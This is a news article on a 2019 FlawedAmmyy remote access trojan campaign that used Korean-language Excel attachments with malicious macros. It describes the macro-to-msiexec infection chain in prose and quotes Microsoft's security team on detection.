Last November 24, 2018, while they were busy with their tRAT malware. The team once again surfaces with a new campaign, this time with a new remote access trojan known to Microsoft as FlawedAmmyy RAT. The technology used by the RAT is the all-time vulnerable language called the Visual Basic for Applications, also known as MS Office Macro language. Upon careful initial inspection of Microsoft security researchers, they discovered that the signature used by FlawedAmmyy is similar to those that were made by TA505 Cybercrime team, but this time around the direct targets are the Windows computers of Korean nationals.
This is because of the use of Korean language with the malicious .xls attachment contains a social engineering-like sentence construction, to entice Korean users to open the Excel files, which will then automatically trigger the malicious macro virus it contains. Since its inception in Office 97, in 1996 which was 23 years ago – Visual Basic for Application is an easy to use platform for malware development. It contains enough subroutines in order to create an automated and propagating malware for Windows computers with an installed instance of Microsoft Office.
“Anomaly detection helped us uncover a new campaign that employs a complex infection chain to download and run the notorious FlawedAmmyy RAT directly in memory. The attack starts with an email and .xls attachment with content in the Korean language,” emphasized Microsoft in its official Twitter handle @MsftSecIntel.
Consumer home users of Microsoft Office rarely need to use macro-enabled documents given their requirements, but for an enterprise environment, the extensive use of macro-enabled documents are a common scene. With VBA, Microsoft made its Office platform a development platform as well for simple documents, spreadsheets or presentations to behave like apps themselves. Seems like 23-years since Office 97’s release, Microsoft has not yet solved the vulnerability of virus authors using the macro language to create their malware. Each new version of Office presented since then claimed a much more secure Office environment for all users, but macro malware remains to be a common type of malware today in 2019.
“When opened, the .xls file automatically runs a macro function that runs msiexec.exe, which in turn downloads an MSI archive. The MSI archive contains a digitally signed executable that is extracted and run[s], and that decrypts and runs another executable in memory,” explained Microsoft in its official Twitter handle @MsftSecIntel.
The macro’s main objective is to use msiexec.exe, a system service to download an MSI-archive of FlawedAmmyy from the command and control center. Windows will not block the MSI archive, as it is digitally signed. The files contained in the archive will not be blocked by Windows User Account Control unlike to an unsigned executable.
“Microsoft Threat Protection defends customers from this attack. Cloud-based machine learning protections in Microsoft Defender ATP blocked all of the components of this attack at first sight, including the FlawedAmmyy RAT payload. Office 365 ATP detects the email campaign,” concluded Microsoft.